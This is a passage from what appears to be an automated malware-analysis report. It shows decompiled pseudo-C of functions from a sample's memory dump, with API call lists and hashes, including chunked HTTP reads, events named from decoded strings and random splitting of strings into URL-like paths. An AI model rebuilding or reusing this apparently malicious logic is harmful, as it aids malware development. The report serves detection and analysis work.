                                                                                                                          					E04973C06(_t79,  &_v156, _a12, _t97);
                                                                                                                          					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
                                                                                                                          					_t66 = E0497227C(_t101, 0x497d168);
                                                                                                                          					_t103 = _t101 - _t79;
                                                                                                                          					_a8 = _t103;
                                                                                                                          					if(_t103 < 0) {
                                                                                                                          						L17:
                                                                                                                          						E0497227C(_a16, _a4);
                                                                                                                          						E04973450(_t79,  &_v428, _a4, _t97);
                                                                                                                          						memset( &_v428, 0, 0x10c);
                                                                                                                          						_t55 = memset( &_v156, 0, 0x84);
                                                                                                                          						goto L18;
                                                                                                                          					}
                                                                                                                          					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
                                                                                                                          					do {
                                                                                                                          						if(_v8 != 0xffffffff) {
                                                                                                                          							_push(1);
                                                                                                                          							_push(0);
                                                                                                                          							_push(0);
                                                                                                                          							_push( *_t99);
                                                                                                                          							L0497AED0();
                                                                                                                          							_t74 = _t66 +  *(_t99 - 4);
                                                                                                                          							asm("adc edx, esi");
                                                                                                                          							_push(0);
                                                                                                                          							_push(_v8 + 1);
                                                                                                                          							_push(_t92);
                                                                                                                          							_push(_t74);
                                                                                                                          							L0497AECA();
                                                                                                                          							if(_t92 > 0 || _t74 > 0xffffffff) {
                                                                                                                          								_t74 = _t74 | 0xffffffff;
                                                                                                                          								_v16 = _v16 & 0x00000000;
                                                                                                                          							}
                                                                                                                          						} else {
                                                                                                                          							_t74 =  *_t99;
                                                                                                                          						}
                                                                                                                          						_t106 = _t107 + _a8 * 4 - 0x1a8;
                                                                                                                          						_a12 = _t74;
                                                                                                                          						_t76 = E04972420(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
                                                                                                                          						while(1) {
                                                                                                                          							 *_t99 =  *_t99 - _t76;
                                                                                                                          							if( *_t99 != 0) {
                                                                                                                          								goto L14;
                                                                                                                          							}
                                                                                                                          							L13:
                                                                                                                          							_t92 =  &_v156;
                                                                                                                          							if(E04973F60(_t79, _t92, _t106) < 0) {
                                                                                                                          								break;
                                                                                                                          							}
                                                                                                                          							L14:
                                                                                                                          							_a12 = _a12 + 1;
                                                                                                                          							_t76 = E04972775(_t79,  &_v156, _t106, _t106);
                                                                                                                          							 *_t99 =  *_t99 - _t76;
                                                                                                                          							if( *_t99 != 0) {
                                                                                                                          								goto L14;
                                                                                                                          							}
                                                                                                                          							goto L13;
                                                                                                                          						}
                                                                                                                          						_a8 = _a8 - 1;
                                                                                                                          						_t66 = _a12;
                                                                                                                          						_t99 = _t99 - 4;
                                                                                                                          						 *(0x497d168 + _a8 * 4) = _t66;
                                                                                                                          					} while (_a8 >= 0);
                                                                                                                          					_t97 = _v12;
                                                                                                                          					goto L17;
                                                                                                                          				}
                                                                                                                          				while(_t81 < _t96) {
                                                                                                                          					_t81 = _t81 + 1;
                                                                                                                          					_t56 = _t56 >> 1;
                                                                                                                          					if(_t56 != 0) {
                                                                                                                          						continue;
                                                                                                                          					}
                                                                                                                          					goto L4;
                                                                                                                          				}
                                                                                                                          				goto L4;
                                                                                                                          			}


                                                                                                                          APIs
                                                                                                                          • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 04977BE3
                                                                                                                          • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 04977BF9
                                                                                                                          • memset.NTDLL ref: 04977CA2
                                                                                                                          • memset.NTDLL ref: 04977CB8
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.942731260.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.942716356.0000000004970000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942751568.000000000497C000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942765529.000000000497D000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942780831.000000000497F000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$_allmul_aulldiv
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3041852380-0
                                                                                                                          • Opcode ID: a666261e5480f766eed9f30efe7e59dd910b27e8206c3589e7e84efeddc6b7a4
                                                                                                                          • Instruction ID: a90a943d5ef0d62990b010677dcef94601a3c920f1593f112b697e8081d7ed89
                                                                                                                          • Opcode Fuzzy Hash: a666261e5480f766eed9f30efe7e59dd910b27e8206c3589e7e84efeddc6b7a4
                                                                                                                          • Instruction Fuzzy Hash: 16418231A00219BFEF109FA8CC44BDE7B79EF89314F1445B9E90597280EB70BA54CB90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 57%
                                                                                                                          			E04974F07(void* __eax) {
                                                                                                                          				long _v8;
                                                                                                                          				char _v12;
                                                                                                                          				char _v16;
                                                                                                                          				intOrPtr _v20;
                                                                                                                          				void* _v24;
                                                                                                                          				void* __esi;
                                                                                                                          				void* _t41;
                                                                                                                          				char* _t42;
                                                                                                                          				long _t43;
                                                                                                                          				intOrPtr _t47;
                                                                                                                          				intOrPtr* _t48;
                                                                                                                          				char _t50;
                                                                                                                          				char* _t55;
                                                                                                                          				long _t56;
                                                                                                                          				intOrPtr* _t57;
                                                                                                                          				void* _t60;
                                                                                                                          				void* _t61;
                                                                                                                          				void* _t68;
                                                                                                                          				void* _t72;
                                                                                                                          				void* _t73;
                                                                                                                          				void* _t74;
                                                                                                                          				void* _t78;
                                                                                                                          
                                                                                                                          				_t72 = __eax;
                                                                                                                          				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
                                                                                                                          					L2:
                                                                                                                          					_t41 = _t72;
                                                                                                                          					_pop(_t73);
                                                                                                                          					_t74 = _t41;
                                                                                                                          					_t42 =  &_v12;
                                                                                                                          					_v8 = 0;
                                                                                                                          					_v16 = 0;
                                                                                                                          					__imp__( *((intOrPtr*)(_t74 + 0x18)), _t42, _t68, _t73, _t61, _t78);
                                                                                                                          					if(_t42 == 0) {
                                                                                                                          						_t43 = GetLastError();
                                                                                                                          						_v8 = _t43;
                                                                                                                          						if(_t43 == 0x2efe) {
                                                                                                                          							_v8 = 0;
                                                                                                                          							goto L29;
                                                                                                                          						}
                                                                                                                          					} else {
                                                                                                                          						if(_v12 == 0) {
                                                                                                                          							L29:
                                                                                                                          							 *((intOrPtr*)(_t74 + 0x30)) = 0;
                                                                                                                          						} else {
                                                                                                                          							_push( &_v24);
                                                                                                                          							_push(1);
                                                                                                                          							_push(0);
                                                                                                                          							if( *0x497d130() != 0) {
                                                                                                                          								_v8 = 8;
                                                                                                                          							} else {
                                                                                                                          								_t47 = E049775F6(0x1000);
                                                                                                                          								_v20 = _t47;
                                                                                                                          								if(_t47 == 0) {
                                                                                                                          									_v8 = 8;
                                                                                                                          								} else {
                                                                                                                          									goto L8;
                                                                                                                          									do {
                                                                                                                          										while(1) {
                                                                                                                          											L8:
                                                                                                                          											_t50 = _v12;
                                                                                                                          											if(_t50 >= 0x1000) {
                                                                                                                          												_t50 = 0x1000;
                                                                                                                          											}
                                                                                                                          											__imp__( *((intOrPtr*)(_t74 + 0x18)), _v20, _t50,  &_v16);
                                                                                                                          											if(_t50 == 0) {
                                                                                                                          												break;
                                                                                                                          											}
                                                                                                                          											_t57 = _v24;
                                                                                                                          											 *((intOrPtr*)( *_t57 + 0x10))(_t57, _v20, _v16, 0);
                                                                                                                          											_t18 =  &_v12;
                                                                                                                          											 *_t18 = _v12 - _v16;
                                                                                                                          											if( *_t18 != 0) {
                                                                                                                          												continue;
                                                                                                                          											} else {
                                                                                                                          											}
                                                                                                                          											L14:
                                                                                                                          											if(WaitForSingleObject( *0x497d2a4, 0) != 0x102) {
                                                                                                                          												_v8 = 0x102;
                                                                                                                          											} else {
                                                                                                                          												_t55 =  &_v12;
                                                                                                                          												__imp__( *((intOrPtr*)(_t74 + 0x18)), _t55);
                                                                                                                          												if(_t55 != 0) {
                                                                                                                          													goto L19;
                                                                                                                          												} else {
                                                                                                                          													_t56 = GetLastError();
                                                                                                                          													_v8 = _t56;
                                                                                                                          													if(_t56 == 0x2f78 && _v12 == 0) {
                                                                                                                          														_v8 = 0;
                                                                                                                          														goto L19;
                                                                                                                          													}
                                                                                                                          												}
                                                                                                                          											}
                                                                                                                          											L22:
                                                                                                                          											E04974AAB(_v20);
                                                                                                                          											if(_v8 == 0) {
                                                                                                                          												_v8 = E04973B3F(_v24, _t74);
                                                                                                                          											}
                                                                                                                          											goto L25;
                                                                                                                          										}
                                                                                                                          										_v8 = GetLastError();
                                                                                                                          										goto L14;
                                                                                                                          										L19:
                                                                                                                          									} while (_v12 != 0);
                                                                                                                          									goto L22;
                                                                                                                          								}
                                                                                                                          								L25:
                                                                                                                          								_t48 = _v24;
                                                                                                                          								 *((intOrPtr*)( *_t48 + 8))(_t48);
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					return _v8;
                                                                                                                          				} else {
                                                                                                                          					_t60 = E0497121A(__eax);
                                                                                                                          					if(_t60 != 0) {
                                                                                                                          						return _t60;
                                                                                                                          					} else {
                                                                                                                          						goto L2;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          			}

                                                                                                                          APIs
                                                                                                                          • WaitForSingleObject.KERNEL32(00000000), ref: 049776AF
                                                                                                                          • GetLastError.KERNEL32 ref: 049776CF
                                                                                                                            • Part of subcall function 0497121A: wcstombs.NTDLL ref: 049712DC
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.942731260.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.942716356.0000000004970000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942751568.000000000497C000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942765529.000000000497D000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942780831.000000000497F000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLastObjectSingleWaitwcstombs
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2344289193-0
                                                                                                                          • Opcode ID: dc76a99dd1a0574b3761ff746330fb76afddf3890d00715b872025e8129e3036
                                                                                                                          • Instruction ID: f5f4aff9e8e068424d763f3d0b45b837315b64f1d1854502069b218f5f3d6abb
                                                                                                                          • Opcode Fuzzy Hash: dc76a99dd1a0574b3761ff746330fb76afddf3890d00715b872025e8129e3036
                                                                                                                          • Instruction Fuzzy Hash: 2B41E975A00219EFDF10AFE8D984AAEBBB9FB44345F2048B9E502E6141E734BE40DB51
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • SysAllocString.OLEAUT32(80000002), ref: 04973DFD
                                                                                                                          • SysAllocString.OLEAUT32(049728D9), ref: 04973E41
                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 04973E55
                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 04973E63
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.942731260.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.942716356.0000000004970000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942751568.000000000497C000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942765529.000000000497D000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942780831.000000000497F000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: String$AllocFree
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 344208780-0
                                                                                                                          • Opcode ID: 8d6fcbeb095276a12107edb4946fee57f56cfca37b829a3cc13c1fcc6f32aab1
                                                                                                                          • Instruction ID: 314f3bec420046f4f9634843ca107bb08977df7f82ce0750342948bd507bab34
                                                                                                                          • Opcode Fuzzy Hash: 8d6fcbeb095276a12107edb4946fee57f56cfca37b829a3cc13c1fcc6f32aab1
                                                                                                                          • Instruction Fuzzy Hash: A3311076900209EFCB15DF98D8C48AE7BB9FF48340B10847EF90597250D775AA41DFA5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 87%
                                                                                                                          			E04977CC7(signed int _a4, signed int* _a8) {
                                                                                                                          				void* __ecx;
                                                                                                                          				void* __edi;
                                                                                                                          				signed int _t6;
                                                                                                                          				intOrPtr _t8;
                                                                                                                          				intOrPtr _t12;
                                                                                                                          				short* _t19;
                                                                                                                          				void* _t25;
                                                                                                                          				signed int* _t28;
                                                                                                                          				CHAR* _t30;
                                                                                                                          				long _t31;
                                                                                                                          				intOrPtr* _t32;
                                                                                                                          
                                                                                                                          				_t6 =  *0x497d2a8; // 0xd448b889
                                                                                                                          				_t32 = _a4;
                                                                                                                          				_a4 = _t6 ^ 0x109a6410;
                                                                                                                          				_t8 =  *0x497d2e0; // 0x267a5a8
                                                                                                                          				_t3 = _t8 + 0x497e876; // 0x61636f4c
                                                                                                                          				_t25 = 0;
                                                                                                                          				_t30 = E04973CC2(_t3, 1);
                                                                                                                          				if(_t30 != 0) {
                                                                                                                          					_t25 = CreateEventA(0x497d2e4, 1, 0, _t30);
                                                                                                                          					E04974AAB(_t30);
                                                                                                                          				}
                                                                                                                          				_t12 =  *0x497d294; // 0x4000000a
                                                                                                                          				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E04974A03() != 0) {
                                                                                                                          					L12:
                                                                                                                          					_t28 = _a8;
                                                                                                                          					if(_t28 != 0) {
                                                                                                                          						 *_t28 =  *_t28 | 0x00000001;
                                                                                                                          					}
                                                                                                                          					_t31 = E04971000(_t32, 0);
                                                                                                                          					if(_t31 == 0 && _t25 != 0) {
                                                                                                                          						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                                                                                                          					}
                                                                                                                          					if(_t28 != 0 && _t31 != 0) {
                                                                                                                          						 *_t28 =  *_t28 & 0xfffffffe;
                                                                                                                          					}
                                                                                                                          					goto L20;
                                                                                                                          				} else {
                                                                                                                          					_t19 =  *0x497d108( *_t32, 0x20);
                                                                                                                          					if(_t19 != 0) {
                                                                                                                          						 *_t19 = 0;
                                                                                                                          						_t19 = _t19 + 2;
                                                                                                                          					}
                                                                                                                          					_t31 = E04975AB2(0,  *_t32, _t19, 0);
                                                                                                                          					if(_t31 == 0) {
                                                                                                                          						if(_t25 == 0) {
                                                                                                                          							L22:
                                                                                                                          							return _t31;
                                                                                                                          						}
                                                                                                                          						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                                                                                                          						if(_t31 == 0) {
                                                                                                                          							L20:
                                                                                                                          							if(_t25 != 0) {
                                                                                                                          								CloseHandle(_t25);
                                                                                                                          							}
                                                                                                                          							goto L22;
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					goto L12;
                                                                                                                          				}
                                                                                                                          			}


                                                                                                                          APIs
                                                                                                                            • Part of subcall function 04973CC2: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,06FF9B38,00000000,?,?,69B25F44,00000005,0497D00C,?,?,0497539B), ref: 04973CF8
                                                                                                                            • Part of subcall function 04973CC2: lstrcpy.KERNEL32(00000000,00000000), ref: 04973D1C
                                                                                                                            • Part of subcall function 04973CC2: lstrcat.KERNEL32(00000000,00000000), ref: 04973D24
                                                                                                                          • CreateEventA.KERNEL32(0497D2E4,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,049721B6,?,00000001,?), ref: 04977D08
                                                                                                                            • Part of subcall function 04974AAB: HeapFree.KERNEL32(00000000,00000000,04975012,00000000,?,?,00000000), ref: 04974AB7
                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,049721B6,00000000,00000000,?,00000000,?,049721B6,?,00000001,?,?,?,?,0497555B), ref: 04977D68
                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,049721B6,?,00000001,?), ref: 04977D96
                                                                                                                          • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,049721B6,?,00000001,?,?,?,?,0497555B), ref: 04977DAE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.942731260.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.942716356.0000000004970000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942751568.000000000497C000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942765529.000000000497D000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942780831.000000000497F000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 73268831-0
                                                                                                                          • Opcode ID: 1783f67a94a30b8d29f62cf2a9764c838dcb3d476a94786ca67890d8b0fc3eb5
                                                                                                                          • Instruction ID: 499ff92735f56521c57fb0790140ca2833608566d4eea94e5466e2474411447b
                                                                                                                          • Opcode Fuzzy Hash: 1783f67a94a30b8d29f62cf2a9764c838dcb3d476a94786ca67890d8b0fc3eb5
                                                                                                                          • Instruction Fuzzy Hash: 6421E4326047126BD7315EE89C48A7B769DFFC8B14B0547B6F945EB100DA24FC018794
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 40%
                                                                                                                          			E04972107(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                                                                                                                          				intOrPtr _v12;
                                                                                                                          				void* _v16;
                                                                                                                          				void* _v28;
                                                                                                                          				char _v32;
                                                                                                                          				void* __esi;
                                                                                                                          				void* _t29;
                                                                                                                          				void* _t38;
                                                                                                                          				signed int* _t39;
                                                                                                                          				void* _t40;
                                                                                                                          
                                                                                                                          				_t36 = __ecx;
                                                                                                                          				_v32 = 0;
                                                                                                                          				asm("stosd");
                                                                                                                          				asm("stosd");
                                                                                                                          				asm("stosd");
                                                                                                                          				asm("stosd");
                                                                                                                          				asm("stosd");
                                                                                                                          				_v12 = _a4;
                                                                                                                          				_t38 = E04973946(__ecx,  &_v32);
                                                                                                                          				if(_t38 != 0) {
                                                                                                                          					L12:
                                                                                                                          					_t39 = _a8;
                                                                                                                          					L13:
                                                                                                                          					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                                                                                                                          						_t16 =  &(_t39[1]); // 0x5
                                                                                                                          						_t23 = _t16;
                                                                                                                          						if( *_t16 != 0) {
                                                                                                                          							E049765EA(_t23);
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					return _t38;
                                                                                                                          				}
                                                                                                                          				if(E049737AC(0x40,  &_v16) != 0) {
                                                                                                                          					_v16 = 0;
                                                                                                                          				}
                                                                                                                          				_t40 = CreateEventA(0x497d2e4, 1, 0,  *0x497d384);
                                                                                                                          				if(_t40 != 0) {
                                                                                                                          					SetEvent(_t40);
                                                                                                                          					Sleep(0xbb8);
                                                                                                                          					CloseHandle(_t40);
                                                                                                                          				}
                                                                                                                          				_push( &_v32);
                                                                                                                          				if(_a12 == 0) {
                                                                                                                          					_t29 = E049724BE(_t36);
                                                                                                                          				} else {
                                                                                                                          					_push(0);
                                                                                                                          					_push(0);
                                                                                                                          					_push(0);
                                                                                                                          					_push(0);
                                                                                                                          					_push(0);
                                                                                                                          					_t29 = E0497282B(_t36);
                                                                                                                          				}
                                                                                                                          				_t41 = _v16;
                                                                                                                          				_t38 = _t29;
                                                                                                                          				if(_v16 != 0) {
                                                                                                                          					E049751BB(_t41);
                                                                                                                          				}
                                                                                                                          				if(_t38 != 0) {
                                                                                                                          					goto L12;
                                                                                                                          				} else {
                                                                                                                          					_t39 = _a8;
                                                                                                                          					_t38 = E04977CC7( &_v32, _t39);
                                                                                                                          					goto L13;
                                                                                                                          				}
                                                                                                                          			}

                                                                                                                          APIs
                                                                                                                          • CreateEventA.KERNEL32(0497D2E4,00000001,00000000,00000040,00000001,?,73BCF710,00000000,73BCF730,?,?,?,0497555B,?,00000001,?), ref: 04972158
                                                                                                                          • SetEvent.KERNEL32(00000000,?,?,?,0497555B,?,00000001,?,00000002,?,?,049753C9,?), ref: 04972165
                                                                                                                          • Sleep.KERNEL32(00000BB8,?,?,?,0497555B,?,00000001,?,00000002,?,?,049753C9,?), ref: 04972170
                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,0497555B,?,00000001,?,00000002,?,?,049753C9,?), ref: 04972177
                                                                                                                            • Part of subcall function 049724BE: WaitForSingleObject.KERNEL32(00000000,?,?,?,04972197,?,04972197,?,?,?,?,?,04972197,?), ref: 04972598
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.942731260.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.942716356.0000000004970000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942751568.000000000497C000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942765529.000000000497D000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942780831.000000000497F000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2559942907-0
                                                                                                                          • Opcode ID: 5e01b7b2af9fff5cc8ef8dd3bcb1833c89a955a5477075fb68030765c602a0e0
                                                                                                                          • Instruction ID: 49ebbc41f484bf654a6e6dba5da1624a1ff97231552a010da76a1da691f87053
                                                                                                                          • Opcode Fuzzy Hash: 5e01b7b2af9fff5cc8ef8dd3bcb1833c89a955a5477075fb68030765c602a0e0
                                                                                                                          • Instruction Fuzzy Hash: 8A214F72910219AFDF20AFE48884DAE77BDFF88394B0544B5EB51A7200E734B945CBA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 78%
                                                                                                                          			E049722D2(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                                                                                                                          				intOrPtr _v8;
                                                                                                                          				void* _v12;
                                                                                                                          				void* _v16;
                                                                                                                          				intOrPtr _t26;
                                                                                                                          				intOrPtr* _t28;
                                                                                                                          				intOrPtr _t31;
                                                                                                                          				intOrPtr* _t32;
                                                                                                                          				void* _t39;
                                                                                                                          				int _t46;
                                                                                                                          				intOrPtr* _t47;
                                                                                                                          				int _t48;
                                                                                                                          
                                                                                                                          				_t47 = __eax;
                                                                                                                          				_push( &_v12);
                                                                                                                          				_push(__eax);
                                                                                                                          				_t39 = 0;
                                                                                                                          				_t46 = 0;
                                                                                                                          				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
                                                                                                                          				_v8 = _t26;
                                                                                                                          				if(_t26 < 0) {
                                                                                                                          					L13:
                                                                                                                          					return _v8;
                                                                                                                          				}
                                                                                                                          				if(_v12 == 0) {
                                                                                                                          					Sleep(0xc8);
                                                                                                                          					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                                                                                                                          				}
                                                                                                                          				if(_v8 >= _t39) {
                                                                                                                          					_t28 = _v12;
                                                                                                                          					if(_t28 != 0) {
                                                                                                                          						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
                                                                                                                          						_v8 = _t31;
                                                                                                                          						if(_t31 >= 0) {
                                                                                                                          							_t46 = lstrlenW(_v16);
                                                                                                                          							if(_t46 != 0) {
                                                                                                                          								_t46 = _t46 + 1;
                                                                                                                          								_t48 = _t46 + _t46;
                                                                                                                          								_t39 = E049775F6(_t48);
                                                                                                                          								if(_t39 == 0) {
                                                                                                                          									_v8 = 0x8007000e;
                                                                                                                          								} else {
                                                                                                                          									memcpy(_t39, _v16, _t48);
                                                                                                                          								}
                                                                                                                          								__imp__#6(_v16);
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						_t32 = _v12;
                                                                                                                          						 *((intOrPtr*)( *_t32 + 8))(_t32);
                                                                                                                          					}
                                                                                                                          					 *_a4 = _t39;
                                                                                                                          					 *_a8 = _t46 + _t46;
                                                                                                                          				}
                                                                                                                          				goto L13;
                                                                                                                          			}

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.942731260.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.942716356.0000000004970000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942751568.000000000497C000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942765529.000000000497D000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942780831.000000000497F000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeSleepStringlstrlenmemcpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1198164300-0
                                                                                                                          • Opcode ID: 428becd7602865de561e3ef65b3652404ec728d38fbf11cd7b7aa25e57c3b7bb
                                                                                                                          • Instruction ID: 790e973fea2f7fd67115a8ad1a1c408e9868ccdfa3b9f8eda87ee0292a9a9817
                                                                                                                          • Opcode Fuzzy Hash: 428becd7602865de561e3ef65b3652404ec728d38fbf11cd7b7aa25e57c3b7bb
                                                                                                                          • Instruction Fuzzy Hash: 24214175900209FFCB11DFA8C98499EBBB9FF89705B1041B9E941E7310EB34EA41CB51
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 68%
                                                                                                                          			E049726DD(unsigned int __eax, void* __ecx) {
                                                                                                                          				void* _v8;
                                                                                                                          				void* _v12;
                                                                                                                          				signed int _t21;
                                                                                                                          				signed short _t23;
                                                                                                                          				char* _t27;
                                                                                                                          				void* _t29;
                                                                                                                          				void* _t30;
                                                                                                                          				unsigned int _t33;
                                                                                                                          				void* _t37;
                                                                                                                          				unsigned int _t38;
                                                                                                                          				void* _t41;
                                                                                                                          				void* _t42;
                                                                                                                          				int _t45;
                                                                                                                          				void* _t46;
                                                                                                                          
                                                                                                                          				_t42 = __eax;
                                                                                                                          				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
                                                                                                                          				_t38 = __eax;
                                                                                                                          				_t30 = RtlAllocateHeap( *0x497d270, 0, (__eax >> 3) + __eax + 1);
                                                                                                                          				_v12 = _t30;
                                                                                                                          				if(_t30 != 0) {
                                                                                                                          					_v8 = _t42;
                                                                                                                          					do {
                                                                                                                          						_t33 = 0x18;
                                                                                                                          						if(_t38 <= _t33) {
                                                                                                                          							_t33 = _t38;
                                                                                                                          						}
                                                                                                                          						_t21 =  *0x497d288; // 0x0
                                                                                                                          						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
                                                                                                                          						 *0x497d288 = _t23;
                                                                                                                          						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
                                                                                                                          						memcpy(_t30, _v8, _t45);
                                                                                                                          						_v8 = _v8 + _t45;
                                                                                                                          						_t27 = _t30 + _t45;
                                                                                                                          						_t38 = _t38 - _t45;
                                                                                                                          						_t46 = _t46 + 0xc;
                                                                                                                          						 *_t27 = 0x2f;
                                                                                                                          						_t13 = _t27 + 1; // 0x1
                                                                                                                          						_t30 = _t13;
                                                                                                                          					} while (_t38 > 8);
                                                                                                                          					memcpy(_t30, _v8, _t38 + 1);
                                                                                                                          				}
                                                                                                                          				return _v12;
                                                                                                                          			}


















                                                                                                                          APIs
                                                                                                                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04971A07,00000000,?,?,04974653,?,06FF95B0), ref: 049726E8
                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 04972700
                                                                                                                          • memcpy.NTDLL(00000000,?,-00000008,?,?,?,04971A07,00000000,?,?,04974653,?,06FF95B0), ref: 04972744
                                                                                                                          • memcpy.NTDLL(00000001,?,00000001), ref: 04972765
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.942731260.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.942716356.0000000004970000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942751568.000000000497C000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942765529.000000000497D000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942780831.000000000497F000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpy$AllocateHeaplstrlen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1819133394-0
                                                                                                                          • Opcode ID: da0772bcccfd64a5ee2e58ac6fcee4fb8b1ef8a0e611daf8178dc69078d7eb3f
                                                                                                                          • Instruction ID: cb6961c987a0037eb753514ad5af62d310b55231968d03ee0f2f49bc956bc6ac
                                                                                                                          • Opcode Fuzzy Hash: da0772bcccfd64a5ee2e58ac6fcee4fb8b1ef8a0e611daf8178dc69078d7eb3f
                                                                                                                          • Instruction Fuzzy Hash: C911E572A00214BFD710CB69DD88D9EBFBEDFC0660F150276F504D7250EA74AE4597A0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 68%
                                                                                                                          			E04974A03() {
                                                                                                                          				char _v264;
                                                                                                                          				void* _v300;
                                                                                                                          				int _t8;
                                                                                                                          				intOrPtr _t9;
